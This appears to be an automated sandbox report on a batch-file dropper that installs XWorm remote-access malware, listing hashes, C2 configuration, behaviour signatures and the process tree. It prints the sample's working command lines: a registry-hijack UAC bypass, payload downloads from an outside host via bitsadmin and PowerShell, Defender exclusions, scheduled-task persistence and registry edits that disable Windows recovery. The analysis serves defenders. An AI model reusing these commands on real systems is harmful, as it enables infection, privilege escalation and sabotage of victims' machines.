Analysis
-
max time kernel
563s -
max time network
602s -
platform
windows10-1703_x64 -
resource
win10-20240611-en -
resource tags
arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system -
submitted
27-07-2024 23:17
Static task
static1
Behavioral task
behavioral1
Sample
Uac Bypass Rat.bat
Resource
win10-20240611-en
Behavioral task
behavioral2
Sample
Uac Bypass Rat.bat
Resource
win11-20240709-en
General
-
Target
Uac Bypass Rat.bat
-
Size
782B
-
MD5
010176f3c136ca25c2e29e00bc9e75a7
-
SHA1
344e7b8a9aa08b20bf17ac7f1fb01db13ad6e827
-
SHA256
a5414f82d063d24e7f0d7e417024ba796c6e52fcb07cd8e59c306fe0e05b7518
-
SHA512
5030daf2afdb75c67a38e428a9eef5c133aadf1c9484047556d3adf338bb2802ef7fc8cca01964a3715cc42c726c6d97b81ceacdfc620bfb5cab6a75b07816e0
Malware Config
Extracted
xworm
5.0
las-protected.gl.at.ply.gg:59571
57uEOC4VgAs3IeCB
-
Install_directory
%Userprofile%
-
install_file
Uni.exe
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x000900000001ab08-37.dat family_xworm behavioral1/memory/468-39-0x0000000000D30000-0x0000000000D40000-memory.dmp family_xworm -
Blocklisted process makes network request 1 IoCs
flow pid Process 8 260 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2192 powershell.exe 4716 powershell.exe 1432 powershell.exe 1564 powershell.exe 260 powershell.exe -
Disables RegEdit via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" reg.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 5104 bitsadmin.exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uni.lnk Uni.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uni.lnk Uni.exe -
Executes dropped EXE 12 IoCs
pid Process 468 Uni.exe 4724 Uni.exe 4040 Uni.exe 4144 cknnzt.exe 708 MonkeModManager.exe 3104 Uni.exe 4280 Uni.exe 532 Uni.exe 2832 Uni.exe 3428 Uni.exe 2096 Uni.exe 4420 Uni.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000\Software\Microsoft\Windows\CurrentVersion\Run\Uni = "C:\\Users\\Admin\\Uni.exe" Uni.exe -
pid Process 1032 certutil.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 9 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\Recovery ReAgentc.exe File opened for modification C:\Windows\SysWOW64\Recovery\ReAgent.xml ReAgentc.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml ReAgentc.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4560 sc.exe 64 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 33 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cknnzt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ReAgentc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Modifies registry class 38 IoCs
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 MonkeModManager.exe Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\mscfile\shell reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\mscfile\shell\open\command\ = "cmd.exe /c reg delete HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /f & C:\\Windows\\System32\\cmd.exe" reg.exe Set value (data) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff MonkeModManager.exe Set value (data) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff MonkeModManager.exe Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\mscfile\shell\open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell MonkeModManager.exe Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU MonkeModManager.exe Set value (int) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" MonkeModManager.exe Set value (int) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" MonkeModManager.exe Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg MonkeModManager.exe Set value (int) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" MonkeModManager.exe Set value (int) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" MonkeModManager.exe Set value (str) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" MonkeModManager.exe Set value (int) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257" MonkeModManager.exe Set value (data) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 MonkeModManager.exe Set value (data) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 MonkeModManager.exe Set value (int) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" MonkeModManager.exe Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags MonkeModManager.exe Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 MonkeModManager.exe Set value (int) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" MonkeModManager.exe Set value (int) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" MonkeModManager.exe Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\mscfile reg.exe Set value (data) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 MonkeModManager.exe Set value (data) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 MonkeModManager.exe Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} MonkeModManager.exe Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance MonkeModManager.exe Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\mscfile\shell\open reg.exe Set value (data) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots MonkeModManager.exe Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell MonkeModManager.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance MonkeModManager.exe Set value (data) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff MonkeModManager.exe Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 MonkeModManager.exe Set value (data) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff MonkeModManager.exe Set value (str) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" MonkeModManager.exe Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings MonkeModManager.exe Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 MonkeModManager.exe Set value (int) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" MonkeModManager.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 3868 reg.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4380 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 260 powershell.exe 260 powershell.exe 260 powershell.exe 2192 powershell.exe 2192 powershell.exe 2192 powershell.exe 4716 powershell.exe 4716 powershell.exe 4716 powershell.exe 1432 powershell.exe 1432 powershell.exe 1432 powershell.exe 1564 powershell.exe 1564 powershell.exe 1564 powershell.exe 468 Uni.exe 4268 powershell.exe 4268 powershell.exe 4268 powershell.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe 468 Uni.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 656 Process not Found 656 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 260 powershell.exe Token: SeDebugPrivilege 468 Uni.exe Token: SeDebugPrivilege 2192 powershell.exe Token: SeIncreaseQuotaPrivilege 2192 powershell.exe Token: SeSecurityPrivilege 2192 powershell.exe Token: SeTakeOwnershipPrivilege 2192 powershell.exe Token: SeLoadDriverPrivilege 2192 powershell.exe Token: SeSystemProfilePrivilege 2192 powershell.exe Token: SeSystemtimePrivilege 2192 powershell.exe Token: SeProfSingleProcessPrivilege 2192 powershell.exe Token: SeIncBasePriorityPrivilege 2192 powershell.exe Token: SeCreatePagefilePrivilege 2192 powershell.exe Token: SeBackupPrivilege 2192 powershell.exe Token: SeRestorePrivilege 2192 powershell.exe Token: SeShutdownPrivilege 2192 powershell.exe Token: SeDebugPrivilege 2192 powershell.exe Token: SeSystemEnvironmentPrivilege 2192 powershell.exe Token: SeRemoteShutdownPrivilege 2192 powershell.exe Token: SeUndockPrivilege 2192 powershell.exe Token: SeManageVolumePrivilege 2192 powershell.exe Token: 33 2192 powershell.exe Token: 34 2192 powershell.exe Token: 35 2192 powershell.exe Token: 36 2192 powershell.exe Token: SeDebugPrivilege 4716 powershell.exe Token: SeIncreaseQuotaPrivilege 4716 powershell.exe Token: SeSecurityPrivilege 4716 powershell.exe Token: SeTakeOwnershipPrivilege 4716 powershell.exe Token: SeLoadDriverPrivilege 4716 powershell.exe Token: SeSystemProfilePrivilege 4716 powershell.exe Token: SeSystemtimePrivilege 4716 powershell.exe Token: SeProfSingleProcessPrivilege 4716 powershell.exe Token: SeIncBasePriorityPrivilege 4716 powershell.exe Token: SeCreatePagefilePrivilege 4716 powershell.exe Token: SeBackupPrivilege 4716 powershell.exe Token: SeRestorePrivilege 4716 powershell.exe Token: SeShutdownPrivilege 4716 powershell.exe Token: SeDebugPrivilege 4716 powershell.exe Token: SeSystemEnvironmentPrivilege 4716 powershell.exe Token: SeRemoteShutdownPrivilege 4716 powershell.exe Token: SeUndockPrivilege 4716 powershell.exe Token: SeManageVolumePrivilege 4716 powershell.exe Token: 33 4716 powershell.exe Token: 34 4716 powershell.exe Token: 35 4716 powershell.exe Token: 36 4716 powershell.exe Token: SeDebugPrivilege 1432 powershell.exe Token: SeIncreaseQuotaPrivilege 1432 powershell.exe Token: SeSecurityPrivilege 1432 powershell.exe Token: SeTakeOwnershipPrivilege 1432 powershell.exe Token: SeLoadDriverPrivilege 1432 powershell.exe Token: SeSystemProfilePrivilege 1432 powershell.exe Token: SeSystemtimePrivilege 1432 powershell.exe Token: SeProfSingleProcessPrivilege 1432 powershell.exe Token: SeIncBasePriorityPrivilege 1432 powershell.exe Token: SeCreatePagefilePrivilege 1432 powershell.exe Token: SeBackupPrivilege 1432 powershell.exe Token: SeRestorePrivilege 1432 powershell.exe Token: SeShutdownPrivilege 1432 powershell.exe Token: SeDebugPrivilege 1432 powershell.exe Token: SeSystemEnvironmentPrivilege 1432 powershell.exe Token: SeRemoteShutdownPrivilege 1432 powershell.exe Token: SeUndockPrivilege 1432 powershell.exe Token: SeManageVolumePrivilege 1432 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 468 Uni.exe 708 MonkeModManager.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5112 wrote to memory of 4500 5112 cmd.exe 72 PID 5112 wrote to memory of 4500 5112 cmd.exe 72 PID 4500 wrote to memory of 2352 4500 net.exe 73 PID 4500 wrote to memory of 2352 4500 net.exe 73 PID 5112 wrote to memory of 3868 5112 cmd.exe 74 PID 5112 wrote to memory of 3868 5112 cmd.exe 74 PID 5112 wrote to memory of 5104 5112 cmd.exe 75 PID 5112 wrote to memory of 5104 5112 cmd.exe 75 PID 5112 wrote to memory of 260 5112 cmd.exe 78 PID 5112 wrote to memory of 260 5112 cmd.exe 78 PID 5112 wrote to memory of 4536 5112 cmd.exe 79 PID 5112 wrote to memory of 4536 5112 cmd.exe 79 PID 4536 wrote to memory of 1032 4536 cmd.exe 81 PID 4536 wrote to memory of 1032 4536 cmd.exe 81 PID 4536 wrote to memory of 468 4536 cmd.exe 82 PID 4536 wrote to memory of 468 4536 cmd.exe 82 PID 468 wrote to memory of 2192 468 Uni.exe 84 PID 468 wrote to memory of 2192 468 Uni.exe 84 PID 468 wrote to memory of 4716 468 Uni.exe 87 PID 468 wrote to memory of 4716 468 Uni.exe 87 PID 468 wrote to memory of 1432 468 Uni.exe 89 PID 468 wrote to memory of 1432 468 Uni.exe 89 PID 468 wrote to memory of 1564 468 Uni.exe 91 PID 468 wrote to memory of 1564 468 Uni.exe 91 PID 468 wrote to memory of 4380 468 Uni.exe 93 PID 468 wrote to memory of 4380 468 Uni.exe 93 PID 468 wrote to memory of 4144 468 Uni.exe 97 PID 468 wrote to memory of 4144 468 Uni.exe 97 PID 468 wrote to memory of 4144 468 Uni.exe 97 PID 4144 wrote to memory of 4268 4144 cknnzt.exe 98 PID 4144 wrote to memory of 4268 4144 cknnzt.exe 98 PID 4144 wrote to memory of 4268 4144 cknnzt.exe 98 PID 4144 wrote to memory of 708 4144 cknnzt.exe 100 PID 4144 wrote to memory of 708 4144 cknnzt.exe 100 PID 4144 wrote to memory of 4760 4144 cknnzt.exe 101 PID 4144 wrote to memory of 4760 4144 cknnzt.exe 101 PID 4144 wrote to memory of 4760 4144 cknnzt.exe 101 PID 4760 wrote to memory of 2364 4760 cmd.exe 104 PID 4760 wrote to memory of 2364 4760 cmd.exe 104 PID 4760 wrote to memory of 2364 4760 cmd.exe 104 PID 4760 wrote to memory of 4852 4760 cmd.exe 105 PID 4760 wrote to memory of 4852 4760 cmd.exe 105 PID 4760 wrote to memory of 4852 4760 cmd.exe 105 PID 4760 wrote to memory of 1568 4760 cmd.exe 106 PID 4760 wrote to memory of 1568 4760 cmd.exe 106 PID 4760 wrote to memory of 1568 4760 cmd.exe 106 PID 4760 wrote to memory of 3248 4760 cmd.exe 107 PID 4760 wrote to memory of 3248 4760 cmd.exe 107 PID 4760 wrote to memory of 3248 4760 cmd.exe 107 PID 4760 wrote to memory of 3000 4760 cmd.exe 108 PID 4760 wrote to memory of 3000 4760 cmd.exe 108 PID 4760 wrote to memory of 3000 4760 cmd.exe 108 PID 4760 wrote to memory of 1020 4760 cmd.exe 109 PID 4760 wrote to memory of 1020 4760 cmd.exe 109 PID 4760 wrote to memory of 1020 4760 cmd.exe 109 PID 4760 wrote to memory of 1804 4760 cmd.exe 110 PID 4760 wrote to memory of 1804 4760 cmd.exe 110 PID 4760 wrote to memory of 1804 4760 cmd.exe 110 PID 4760 wrote to memory of 4544 4760 cmd.exe 111 PID 4760 wrote to memory of 4544 4760 cmd.exe 111 PID 4760 wrote to memory of 4544 4760 cmd.exe 111 PID 4760 wrote to memory of 4480 4760 cmd.exe 112 PID 4760 wrote to memory of 4480 4760 cmd.exe 112 PID 4760 wrote to memory of 4480 4760 cmd.exe 112 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uac Bypass Rat.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:5112 -
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
PID:4500 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:2352
-
-
-
C:\Windows\system32\reg.exereg add HKCU\Software\Classes\mscfile\shell\open\command /ve /d "cmd.exe /c reg delete HKCU\Software\Classes\mscfile\shell\open\command /f & C:\Windows\System32\cmd.exe" /f2⤵
- Modifies registry class
- Modifies registry key
PID:3868
-
-
C:\Windows\system32\bitsadmin.exebitsadmin /transfer mydownloadjob /download /priority normal https://xworm.xyz/stuff/$sxr-test.bat C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat2⤵
- Download via BitsAdmin
PID:5104
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://xworm.xyz/stuff/$sxr-test.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat'"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:260
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:4536 -
C:\Windows\system32\certutil.execertutil -decodehex temp.hex "Uni.exe"3⤵
- Deobfuscate/Decode Files or Information
PID:1032
-
-
C:\Users\Admin\AppData\Local\Temp\Uni.exeUni.exe3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:468 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Uni.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2192
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Uni.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Uni.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1432
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Uni.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1564
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Uni" /tr "C:\Users\Admin\Uni.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:4380
-
-
C:\Users\Admin\AppData\Local\Temp\cknnzt.exe"C:\Users\Admin\AppData\Local\Temp\cknnzt.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4144 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcABrACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAagBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AbgB5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGoAZgBmACMAPgA="5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4268
-
-
C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe"C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe"5⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:708
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\reset survival.bat" "5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4760 -
C:\Windows\SysWOW64\ReAgentc.exereagentc /disable6⤵
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2364
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableResetPC" /t REG_DWORD /d 1 /f6⤵
- System Location Discovery: System Language Discovery
PID:4852
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableResetPC" /t REG_DWORD /d 1 /f6⤵
- System Location Discovery: System Language Discovery
PID:1568
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\CurrentControlSet\Control\MiniNT" /v "NoWinRE" /t REG_DWORD /d 1 /f6⤵
- System Location Discovery: System Language Discovery
PID:3248
-
-
